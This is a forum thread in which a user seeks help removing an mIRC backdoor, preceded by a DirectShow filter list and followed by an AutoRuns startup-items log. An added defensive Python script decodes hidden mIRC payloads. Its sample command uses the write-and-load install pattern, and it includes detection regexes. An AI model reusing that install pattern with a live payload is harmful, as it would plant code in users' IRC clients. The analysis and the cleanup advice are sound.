MPEG2 TS Source,0x00200000,0,1,MpgTsRdr.ax,
RealVideo Decoder,0x00400000,1,1,RealMediaDX.ax,1.00.0001.0001
Intervideo 3gFileSource,0x00200000,0,2,Source3g.ax,9.00.0000.0000
AC3 Parser Filter,0x00600000,1,1,mpg2splt.ax,6.06.6001.18000
WMT Format Conversion,0x00200000,1,1,WMM2FILT.dll,
9x8Resize,0x00200000,1,1,WMM2FILT.dll,
StreamBufferSink,0x00200000,0,0,sbe.dll,6.06.6001.18000
Intervideo AMR Decoder,0x00200000,1,1,AmrDec.ax,8.01.0000.0000
WMT Virtual Source,0x00200000,0,1,WMM2FILT.dll,
MJPEG Decompressor,0x00600000,1,1,,6.06.6001.18063
InterVideo Demultiplexer,0x00200000,1,1,ividemux.ax,3.02.0055.0000
MPEG-I Stream Splitter,0x00600000,1,2,,6.06.6001.18063
SAMI (CC) Parser,0x00400000,1,1,,6.06.6001.18063
VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.6001.18000
MPC - MPEG-2 Video Decoder (Gabest),0x00500001,1,1,Mpeg2DecFilter.ax,1.01.0796.0000
MPEG-2 Splitter,0x005fffff,1,0,mpg2splt.ax,6.06.6001.18000
Ulead Http Stream Push Source Filter,0x00400000,0,1,ulHttpPushSource.ax,1.00.0000.0000
WMT AudioAnalyzer,0x00200000,1,1,WMM2FILT.dll,
AAC Parser,0x00400000,1,1,aac_parser.ax,1.01.0000.0000
Intervideo TsSplitter Filter,0x00200000,1,2,TsSplitter.ax,1.00.0001.0041
RadLight APE DirectShow Filter,0x00600000,0,1,RLAPEDec.ax,1.00.0000.0000
Microsoft MPEG-2 Video Encoder,0x00200000,2,0,msmpeg2enc.dll,11.00.6001.7000
Stretch Video,0x00200000,1,1,WMM2FILT.dll,
FLV Splitter,0x00600000,1,1,flvDX.dll,1.00.0000.0001
Internal Script Command Renderer,0x00800001,1,0,,6.06.6001.18063
MPEG Audio Decoder,0x03680001,1,1,,6.06.6001.18063
WavPack Audio Decoder,0x00600000,1,1,WavPackDSDecoder.ax,1.01.0000.0484
DV Splitter,0x00600000,1,2,,6.06.6001.18000
Video Mixing Renderer 9,0x00200000,1,0,,6.06.6001.18063
Haali Media Splitter,0x00800001,0,1,splitter.ax,1.07.0401.0003
Haali Media Splitter (AR),0x00400000,1,1,splitter.ax,1.07.0401.0003
Dirac Splitter,0x00600000,1,1,DiracSplitter.ax,1.00.0000.0000
Microsoft MPEG-2 Encoder,0x00200000,2,1,msmpeg2enc.dll,11.00.6001.7000
Frame Eater,0x00200000,1,1,WMM2FILT.dll,
Allocator Fix,0x00200000,1,1,WMM2FILT.dll,
ACM Wrapper,0x00600000,1,1,,6.06.6001.18063
CoreAAC Audio Decoder,0x00800000,1,1,CoreAAC.ax,1.02.0000.0575
Video Renderer,0x00800001,1,0,,6.06.6001.18063
MPEG-2 Video Stream Analyzer,0x00200000,0,0,sbe.dll,6.06.6001.18000
Capture ASF Writer,0x00200000,0,0,WMM2FILT.dll,
Line 21 Decoder,0x00600000,1,1,,6.06.6001.18000
Video Port Manager,0x00600000,2,1,,6.06.6001.18063
Video Renderer,0x00400000,1,0,,6.06.6001.18063
Bitmap Generate,0x00200000,1,1,WMM2FILT.dll,
Proxy Sink,0x00200000,1,0,WMM2FILT.dll,
Haali Video Renderer,0x00200000,1,0,dxr.dll,
RealMedia Source,0x00600000,0,0,RealMediaDX.ax,1.00.0001.0001
Proxy Source,0x00200000,0,1,WMM2FILT.dll,
WM ASF Writer,0x00400000,0,0,,11.00.6001.7000
FLV Video Decoder,0x00600000,1,1,flvDX.dll,1.00.0000.0001
InterVideo Audio Decoder,0x00700000,1,1,iviaudio.ax,8.00.0006.0193
VBI Surface Allocator,0x00600000,1,1,vbisurf.ax,6.00.6001.18000
InterVideo PSIP/SI Filter,0x00200000,0,0,PsiDecod.ax,1.05.0000.0001
WMT Sample Information Filter,0x00200000,1,1,WMM2FILT.dll,
File writer,0x00200000,1,0,,6.06.6001.18000
RadLight MPC DirectShow Filter,0x00600000,0,1,RLMPCDec.ax,1.00.0000.0004
Haali Simple Media Splitter,0x00200000,0,1,splitter.ax,1.07.0401.0003
DirectVobSub,0x00200000,2,1,VSFilter.dll,1.01.0796.0000
RealAudio Decoder,0x00400000,1,1,RealMediaDX.ax,1.00.0001.0001
Honestech VCD/SVCD Encoder,0x00200000,2,0,htvcdsvcd.ax,1.00.0000.0000
DirectVobSub (auto-loading version),0x00800002,2,1,VSFilter.dll,1.01.0796.0000
DVD Navigator,0x00200000,0,3,,6.06.6001.18000
WMT DV Extract,0x00200000,1,1,WMM2FILT.dll,
Overlay Mixer2,0x00200000,1,1,,6.06.6001.18000
Haali Matroska Muxer,0x00200000,1,0,splitter.ax,1.07.0401.0003
AC3Filter,0x40000000,1,1,ac3filter.ax,1.03.0001.0000
AVI Draw,0x00600064,9,1,,6.06.6001.18063
muvee Video Analyser,0x00200000,1,0,mvvanalyse.ax,4.00.0004.0000
muvee Music Analyser,0x00200000,1,0,mvmanalyse.ax,4.00.0004.0000
InterVideo Navigator,0x00190000,0,3,IVInav.ax,8.00.0006.0193
Microsoft MPEG-2 Audio Encoder,0x00200000,2,0,msmpeg2enc.dll,11.00.6001.7000
WST Pager,0x00800000,1,1,WSTPager.ax,6.06.6001.18000
MPEG-2 Demultiplexer,0x00600000,1,1,mpg2splt.ax,6.06.6001.18000
Record Queue,0x00200000,1,1,WMM2FILT.dll,
DV Video Decoder,0x00800000,1,1,,6.06.6001.18000
Intervideo QT source,0x00200000,0,1,iviQTsource.ax,1.00.0000.0001
Ulead WMV/WMA Source Filter,0x00600000,0,2,UleadWMSrcFilter.ax,0.00.0000.0003
ffdshow Audio Processor,0x00200000,1,1,ffdshow.ax,1.00.0005.2052
SampleGrabber,0x00200000,1,1,qedit.dll,6.06.6001.18000
Null Renderer,0x00200000,1,0,qedit.dll,6.06.6001.18000
WMT Log Filter,0x00200000,1,1,WMM2FILT.dll,
Aspect Ratio Resizer 16x9,0x00200000,1,1,AspectRatioConverter16x9.ax,4.00.0004.0000
MPEG-2 Sections and Tables,0x005fffff,1,0,Mpeg2Data.ax,6.06.6001.18000
WMT Virtual Renderer,0x00200000,1,0,WMM2FILT.dll,
FLV Source,0x00600000,0,0,flvDX.dll,1.00.0000.0001
StreamBufferSource,0x00200000,0,0,sbe.dll,6.06.6001.18000
Smart Tee,0x00200000,1,2,,6.06.6001.18000
Overlay Mixer,0x00200000,0,0,,6.06.6001.18000
AVI Decompressor,0x00600000,1,1,,6.06.6001.18063
WMT MuxDeMux Filter,0x00200000,0,0,WMM2FILT.dll,
AVI/WAV File Source,0x00400000,0,2,,6.06.6001.18063
WMT Volume,0x00200000,1,1,WMM2FILT.dll,
Wave Parser,0x00400000,1,1,,6.06.6001.18063
MIDI Parser,0x00400000,1,1,,6.06.6001.18063
Multi-file Parser,0x00400000,1,1,,6.06.6001.18063
File stream renderer,0x00400000,1,1,,6.06.6001.18063
A/V Dummy Filter,0x00200000,1,0,SmabT.spk,
WavPack Audio Splitter,0x00600000,1,1,WavPackDSSplitter.ax,1.01.0000.0323
ffdshow subtitles filter,0x00200000,2,1,ffdshow.ax,1.00.0005.2052
WMT VIH2 Fix,0x00200000,1,1,WMM2FILT.dll,
Microsoft MPEG-1/DD Audio Decoder,0x005fffff,1,1,msmpeg2adec.dll,11.00.6001.7000
RealMedia Splitter,0x00600000,1,1,RealMediaDX.ax,1.00.0001.0001
AVI Mux,0x00200000,1,0,,6.06.6001.18000
Line 21 Decoder 2,0x00600002,1,1,,6.06.6001.18063
File Source (Async.),0x00400000,0,1,,6.06.6001.18063
File Source (URL),0x00400000,0,1,,6.06.6001.18063
AudioRecorder WAV Dest,0x00200000,0,0,,6.00.6001.18000
AudioRecorder Wave Form,0x00200000,0,0,,6.00.6001.18000
SoundRecorder Null Renderer,0x00200000,0,0,,6.00.6001.18000
Ulead Http Stream Source (Async.),0x00400000,0,1,AsyncHttpStream.ax,1.00.0000.0001
Haali Video Sink,0x00200000,1,0,splitter.ax,1.07.0401.0003
Aspect Ratio Resizer 4x3,0x00200000,1,1,AspectRatioConverter4x3.ax,4.00.0004.0000
Dirac Video Decoder,0x00400000,1,1,DiracSplitter.ax,1.00.0000.0000
Infinite Pin Tee Filter,0x00200000,1,1,,6.06.6001.18000
WMT Switch Filter,0x00200000,1,1,WMM2FILT.dll,
Enhanced Video Renderer,0x00200000,1,0,evr.dll,6.00.6001.22164
Uncompressed Domain Shot Detection Filter,0x00200000,1,1,WMM2FILT.dll,
BDA MPEG2 Transport Information Filter,0x00200000,2,0,psisrndr.ax,6.06.6001.18000
InterVideo Subtitle,0x00200000,1,1,IVISubtitle.ax,1.00.0000.0000
MPEG Video Decoder,0x40000001,1,1,,6.06.6001.18063

WDM Streaming Tee/Splitter Devices:
Tee/Sink-to-Sink Converter,0x00200000,1,1,,6.00.6001.18000

Video Compressors:
WMVideo8 Encoder DMO,0x00600800,1,1,,
WMVideo9 Encoder DMO,0x00600800,1,1,,
MSScreen 9 encoder DMO,0x00600800,1,1,,
DV Video Encoder,0x00200000,0,0,,6.06.6001.18000
ffdshow video encoder,0x00100000,1,1,ffdshow.ax,1.00.0005.2052
MJPEG Compressor,0x00200000,0,0,,6.06.6001.18063
Cinepak Codec by Radius,0x00200000,1,1,,6.06.6001.18000
ffdshow Video Codec,0x00200000,1,1,,6.06.6001.18000
Helix I420 YUV Codec,0x00200000,1,1,,6.06.6001.18000
Intel IYUV codec,0x00200000,1,1,,6.06.6001.18000
Microsoft RLE,0x00200000,1,1,,6.06.6001.18000
Microsoft Video 1,0x00200000,1,1,,6.06.6001.18000
Helix YV12 YUV Codec,0x00200000,1,1,,6.06.6001.18000

Audio Compressors:
WM Speech Encoder DMO,0x00600800,1,1,,
WMAudio Encoder DMO,0x00600800,1,1,,
IMA ADPCM,0x00200000,1,1,,6.06.6001.18063
PCM,0x00200000,1,1,,6.06.6001.18063
Microsoft ADPCM,0x00200000,1,1,,6.06.6001.18063
GSM 6.10,0x00200000,1,1,,6.06.6001.18063
CCITT A-Law,0x00200000,1,1,,6.06.6001.18063
CCITT u-Law,0x00200000,1,1,,6.06.6001.18063
AC3,0x00200000,1,1,,6.06.6001.18063
DTS,0x00200000,1,1,,6.06.6001.18063
MPEG Layer-3,0x00200000,1,1,,6.06.6001.18063

Midi Renderers:
Default MidiOut Device,0x00800000,1,0,,6.06.6001.18063
Microsoft GS Wavetable Synth,0x00200000,1,0,,6.06.6001.18063

WDM Streaming Capture Devices:
,0x00000000,0,0,,
,0x00000000,0,0,,

WDM Streaming Rendering Devices:
Realtek HD Audio output,0x00200000,1,1,,6.00.6001.18000

BDA Network Providers:
Microsoft ATSC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBC Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBS Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft DVBT Network Provider,0x00200000,0,1,MSDvbNP.ax,6.06.6000.16386
Microsoft Network Provider,0x00200000,0,1,MSNP.ax,6.06.6001.18000

Multi-Instance Capable VBI Codecs:
VBI Codec,0x00600000,1,4,VBICodec.ax,6.06.6001.18000

BDA Transport Information Renderers:
BDA MPEG2 Transport Information Filter,0x00600000,2,0,psisrndr.ax,6.06.6001.18000
MPEG-2 Sections and Tables,0x00600000,1,0,Mpeg2Data.ax,6.06.6001.18000

BDA CP/CA Filters:
Decrypt/Tag,0x00600000,1,0,EncDec.dll,6.06.6001.18000
Encrypt/Tag,0x00200000,0,0,EncDec.dll,6.06.6001.18000
XDS Codec,0x00200000,0,0,EncDec.dll,6.06.6001.18000

WDM Streaming Communication Transforms:
Tee/Sink-to-Sink Converter,0x00200000,1,1,,6.00.6001.18000

Audio Renderers:
Speakers (Realtek High Definiti,0x00200000,1,0,,6.06.6001.18063
Default DirectSound Device,0x00800000,1,0,,6.06.6001.18063
Default WaveOut Device,0x00200000,1,0,,6.06.6001.18063
DirectSound: Speakers (Realtek High Definition Audio),0x00200000,1,0,,6.06.6001.18063

dox online
11-05-09, 19:37
What actually made you think that? Did your PC start acting up?

jamieoliver22
11-05-09, 19:59
As long as you didn't type it, you will be fine. I have had experience with it before, just don't type it in.

dox online
11-05-09, 20:15
As long as you didn't type it, you will be fine. I have had experience with it before, just don't type it in.

I think they did... BTW why were you typing in suspicious things anyway?

pneboy
11-05-09, 20:36
I think they did... BTW why were you typing in suspicious things anyway?

I thought the person told me about it because I thought it would spam a channel and disconnect me for a minute or 2. I'm seriously in need of getting it out of my computer. I'm not that tech savvy and I just want it out. AVG came up clean, but I've been told that won't find a penny in a pile of pennies.

What actually made you think that? Did your PC start acting up?

Well, I went to the help channel and they said it was a backdoor and klined me from the network because I was a hazard to other users, so I can't get back on there till it's gone.

jamieoliver22
11-05-09, 20:39
I think they did... BTW why were you typing in suspicious things anyway?

I wasn't typing anything in? What are you on about? I was merely saying that I have had experience with mIRC viruses, being a mIRC user for a very long time.

spikejones
11-05-09, 21:13
1. never copy and paste or use any code that you can't read and don't know what it does, unless you get it from a very reliable source. Some guy on IRC or whatever service you are using does not count.

2. run and post the results of ardiag.exe (http://www.tombraiderhub.com/download/ardiag.exe)

3. According to McAfee at http://vil.nai.com/vil/content/v_99962.htm, the backdoor trojan resides in the script.ini file in the mIRC folder. When the mIRC application is opened, the script loads and opens port 33 (UDP), making the victim susceptible to further mIRC exploits.
-you may be able to get by with uninstalling the application, deleting the program directory, and reinstalling.

4. I'd still run ardiag though to ensure no other nasties have infiltrated your machine. Run Kaspersky's free online scan as well (preferably prior to ardiag so we don't point out things it may have cleaned).
http://www.kaspersky.com/
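
The advice in point 1 above is easier to act on when the hidden part of a pasted command can be read without running it. As an added example (not part of the original thread), this Python script decodes the $decode(...,m) argument of a pasted mIRC line offline and lists the constructs worth reading; the sample line, the file name demo.mrc and the indicator list are constructed assumptions.

```python
import base64
import binascii
import re

# $decode(<data>,<switches>): in mIRC the "m" switch selects MIME (base64).
DECODE_CALL = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=\s]+?)\s*,\s*([a-z]+)\s*\)", re.I)

# Constructs to read carefully before a line goes anywhere near a client.
# This list is an illustrative assumption, not a complete signature set.
INDICATORS = [
    ("writes a file", re.compile(r"\bwrite\b", re.I)),
    ("loads a script file", re.compile(r"\bload\s+-rs\b", re.I)),
    ("runs on other users' messages", re.compile(r"\bon\s+[^:\s]+:text:", re.I)),
    ("starts a timer", re.compile(r"\btimer\w*", re.I)),
    ("ignores a user", re.compile(r"\bignore\b", re.I)),
    ("sends messages", re.compile(r"\bmsg\b", re.I)),
    ("reads its own script file", re.compile(r"\$read\(\s*\$script", re.I)),
]


def flag(text):
    """Return the labels of every indicator that appears in text."""
    return [label for label, pattern in INDICATORS if pattern.search(text)]


def decode_mime(data):
    """Base64-decode data, tolerating forum line-wrap spaces and lost padding."""
    compact = re.sub(r"\s+", "", data)
    compact += "=" * (-len(compact) % 4)
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable(raw):
    """Render bytes as ASCII, escaping control and high bytes (colour codes etc.)."""
    text = raw.decode("latin-1")
    return "".join(c if 32 <= ord(c) < 127 else "\\x%02x" % ord(c) for c in text)


def inspect_pasted_command(line):
    """Decode every $decode(...) payload in a pasted line; nothing is executed."""
    outer = DECODE_CALL.sub("$decode(...)", line)  # keep base64 out of the outer scan
    report = {"outer": flag(outer), "payloads": []}
    for match in DECODE_CALL.finditer(line):
        data, switches = match.group(1), match.group(2).lower()
        if "m" not in switches:
            report["payloads"].append(
                {"text": None, "flags": ["not base64 (switches %r)" % switches]})
            continue
        raw = decode_mime(data)
        if raw is None:
            report["payloads"].append({"text": None, "flags": ["undecodable payload"]})
            continue
        text = printable(raw)
        report["payloads"].append({"text": text, "flags": flag(text)})
    return report


# Constructed sample: a harmless ping/pong handler wrapped the same way, with a
# space inserted into the base64 to mimic how forum software breaks long tokens.
SAMPLE_PLAIN = "on 1:text:*ping*:#:{ .msg $chan pong }"
SAMPLE_B64 = base64.b64encode(SAMPLE_PLAIN.encode("latin-1")).decode("ascii")
SAMPLE = "//write demo.mrc $decode(%s %s,m) | .load -rs demo.mrc" % (
    SAMPLE_B64[:20], SAMPLE_B64[20:])

if __name__ == "__main__":
    result = inspect_pasted_command(SAMPLE)
    print("outer command:", ", ".join(result["outer"]) or "nothing flagged")
    for payload in result["payloads"]:
        print("hidden script:", payload["text"])
        print("       flags :", ", ".join(payload["flags"]) or "nothing flagged")
```

A line that both writes a decoded payload to a file and loads that file as a script is installing code into the client, whatever the person offering it says it does.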

jamieoliver22
11-05-09, 21:17
3. According to McAfee at http://vil.nai.com/vil/content/v_99962.htm, the backdoor trojan resides in the script.ini file in the mIRC folder. When the mIRC application is opened, the script loads and opens port 33 (UDP), making the victim susceptible to further mIRC exploits.
-you may be able to get by with uninstalling the application, deleting the program directory, and reinstalling.

In most cases, just deleting the script.ini file will fix it, unless the virus creates other additional files also - if I remember correctly anyway.

pneboy
11-05-09, 21:33
Copy the following text and paste it to your report AS IS!!!

---------------------------------------------------------------
AutoRuns Diagnostics for TRF v 0.5 Developed by EscondeR
---------------------------------------------------------------



Program:
"Provides the interface to Apple mobile devices."
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
Apple Mobile Device
Program path & name:
"c:\program files\common files\apple\mobile device support\bin\applemobiledeviceservice.exe"
Enabled: [V]


Program:
"AVG E-Mail Scanner"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
avg8emc
Program path & name:
"c:\program files\avg\avg8\avgemc.exe"
Enabled: [V]


Program:
"AVG Watchdog Service"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
avg8wd
Program path & name:
"c:\program files\avg\avg8\avgwdsvc.exe"
Enabled: [V]


Program:
"Bonjour allows applications like iTunes and Safari to advertise and discover services on the local network. Having Bonjour running enables you to connect to hardware devices like Apple TV and software services like iTunes sharing and AirTunes. If you disable Bonjour
Publisher:
any network service that explicitly depends on it will fail to start."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
Bonjour Service
Program path & name:
"(Verified) Apple Inc.""c:\program files\bonjour\mdnsresponder.exe"
Enabled: [V]


Program:
"RegMgr Module"
Publisher:
"(Verified) Intervideo Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IviRegMgr
Program path & name:
"c:\program files\common files\intervideo\regmgr\iviregmgr.exe"
Enabled: [V]


Program:
"Manages and controls the Fujitsu Siemens Computers Diagnostic Tools."
Publisher:
"(Not verified) Fujitsu Siemens Computers"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
TestHandler
Program path & name:
"c:\program files\fujitsu siemens computers\systemdiagnostics\onlinediagnostic\testmanager\testhandler.exe"
Enabled: [V]


Program:
"AnyDVD Filter Driver"
Publisher:
"(Verified) SlySoft Inc."
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AnyDVD
Program path & name:
"c:\windows\system32\drivers\anydvd.sys"
Enabled: [V]


Program:
"AVG AVI Loader Driver"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AvgLdx86
Program path & name:
"c:\windows\system32\drivers\avgldx86.sys"
Enabled: [V]


Program:
"AVG Network connection watcher"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
AvgTdiX
Program path & name:
"c:\windows\system32\drivers\avgtdix.sys"
Enabled: [V]


Program:
"ElbyCD Windows NT/2000/XP I/O driver"
Publisher:
"(Verified) Elaborate Bytes AG"
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
ElbyCDIO
Program path & name:
"c:\windows\system32\drivers\elbycdio.sys"
Enabled: [V]


Program:
"IP in IP Tunnel Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
IpInIp
Program path & name:
File not found: system32\DRIVERS\ipinip.sys"
Enabled: [V]


Program:
"IPX Traffic Filter Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFlt
Program path & name:
File not found: system32\DRIVERS\nwlnkflt.sys"
Enabled: [V]


Program:
"IPX Traffic Forwarder Driver"
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
NwlnkFwd
Program path & name:
File not found: system32\DRIVERS\nwlnkfwd.sys"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\System\CurrentControlSet\Services
Entry name:
sptd
Program path & name:
c:\windows\system32\drivers\sptd.sys"
Enabled: [V]


Program:
"Google Desktop"
Publisher:
"(Not verified) Google"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
Entry name:
C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL
Program path & name:
"c:\program files\google\google desktop search\googledesktopnetwork3.dll"
Enabled: [V]


Program:
"AVG Resident Shield Starter"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls
Entry name:
avgrsstx.dll
Program path & name:
"c:\windows\system32\avgrsstx.dll"
Enabled: [V]


Program:
"HotkeyApp"
Publisher:
"(Not verified) Wistron"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
HotkeyApp
Program path & name:
"c:\program files\launch manager\hotkeyapp.exe"
Enabled: [V]


Program:
"Adobe Acrobat SpeedLauncher"
Publisher:
"(Verified) Adobe Systems Incorporated"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Adobe Reader Speed Launcher
Program path & name:
"c:\program files\adobe\reader 8.0\reader\reader_sl.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
CtrlVol
Program path & name:
File not found: C:\Program Files\Launch Manager\CtrlVol.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
LaunchAp
Program path & name:
File not found: C:\Program Files\Launch Manager\LaunchAp.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Wbutton
Program path & name:
File not found: C:\Program Files\Launch Manager\WButton.exe"
Enabled: [V]


Program:
"Google Desktop"
Publisher:
"(Verified) Google Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Desktop Search
Program path & name:
"c:\program files\google\google desktop search\googledesktop.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NPCTray
Program path & name:
File not found: C:\Program Files\Norman\npc\bin\npc_tray.exe"
Enabled: [V]


Program:
" "
Publisher:
"(Not verified) "
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google EULA Launcher
Program path & name:
"c:\program files\google\google eula\googleeulalauncher.exe"
Enabled: [V]


Program:
"AVG Tray Monitor"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
AVG8_TRAY
Program path & name:
"c:\program files\avg\avg8\avgtray.exe"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
SunJavaUpdateSched
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\jusched.exe"
Enabled: [V]


Program:
"QuickTime Task"
Publisher:
"(Not verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
QuickTime Task
Program path & name:
"c:\program files\quicktime\qttask.exe"
Enabled: [V]


Program:
"iTunesHelper Module"
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
iTunesHelper
Program path & name:
"c:\program files\itunes\ituneshelper.exe"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Entry name:
NBKeyScan
Program path & name:
File not found: C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
Enabled: [V]


Program:
"Safe Search pluggable protocol"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\SOFTWARE\Classes\Protocols\Handler
Entry name:
linkscanner
Program path & name:
"c:\program files\avg\avg8\avgpp.dll"
Enabled: [V]


Program:
"ObjectDock"
Publisher:
"(Verified) Stardock Corporation"
Entry path:
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Entry name:
Stardock ObjectDock.lnk
Program path & name:
"c:\program files\stardock\objectdock\objectdock.exe"
Enabled: [V]


Program:
"recovery information"
Publisher:
"(Not verified) fsc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
recinfo
Program path & name:
"c:\recinfo\recinfo.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
Google Update
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"DAEMON Tools Lite"
Publisher:
"(Verified) DAEMON Tools Code Signing Services"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
DAEMON Tools Lite
Program path & name:
"c:\program files\daemon tools lite\daemon.exe"
Enabled: [V]


Program:
"AnyDVD Application"
Publisher:
"(Verified) SlySoft Inc."
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
AnyDVD
Program path & name:
"c:\program files\slysoft\anydvd\anydvdtray.exe"
Enabled: [V]


Program:
"RapidShare Free Account Notifier"
Publisher:
"(Not verified) CMS"
Entry path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Entry name:
CMS_RSChecker
Program path & name:
"c:\users\user\desktop\rsfan\rsfan\rsfan.exe"
Enabled: [V]


Program:
"Google Installer"
Publisher:
"(Verified) Google Inc"
Entry path:
Task Scheduler
Entry name:
GoogleUpdateTaskUserS-1-5-21-4090995505-84853843-37879430-1000.job
Program path & name:
"c:\users\user\appdata\local\google\update\googleupdate.exe"
Enabled: [V]


Program:
"Adobe PDF Helper for Internet Explorer"
Publisher:
"(Verified) Adobe Systems Incorporated"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
Adobe PDF Reader Link Helper
Program path & name:
"c:\program files\common files\adobe\acrobat\activex\acroiehelper.dll"
Enabled: [V]


Program:
"Safe Search for Internet Explorer"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
AVG Safe Search
Program path & name:
"c:\program files\avg\avg8\avgssie.dll"
Enabled: [V]


Program:
"Java(TM) Platform SE binary"
Publisher:
"(Verified) Sun Microsystems Inc."
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
SSVHelper Class
Program path & name:
"c:\program files\java\jre1.6.0_07\bin\ssv.dll"
Enabled: [V]


Program:
"[[[DESCRIPTION]]]-----------------------------------------------"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
AVG Security Toolbar
Program path & name:
"c:\program files\avg\avg8\avgtoolbar.dll"
Enabled: [V]


Program:
"Google IE Client Toolbar"
Publisher:
"(Verified) Google Inc"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Entry name:
Google Toolbar Helper
Program path & name:
"c:\program files\google\googletoolbar1.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
WinRAR shell extension
Program path & name:
c:\program files\winrar\rarext.dll"
Enabled: [V]


Program:
"AVG Shell Extension"
Publisher:
"(Verified) AVG Technologies"
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
AVG8 Shell Extension
Program path & name:
"c:\program files\avg\avg8\avgse.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
Haali Column Provider
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
Haali Matroska Shell Property Page
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
N/A
Publisher:
N/A
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
Haali Matroska Thumbnail Extractor
Program path & name:
c:\program files\haali\matroskasplitter\mmfinfo.dll"
Enabled: [V]


Program:
"iTunes Mini Player DLL"
Publisher:
"(Verified) Apple Inc."
Entry path:
HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved
Entry name:
iTunes
Program path & name:
"c:\program files\itunes\itunesminiplayer.dll"
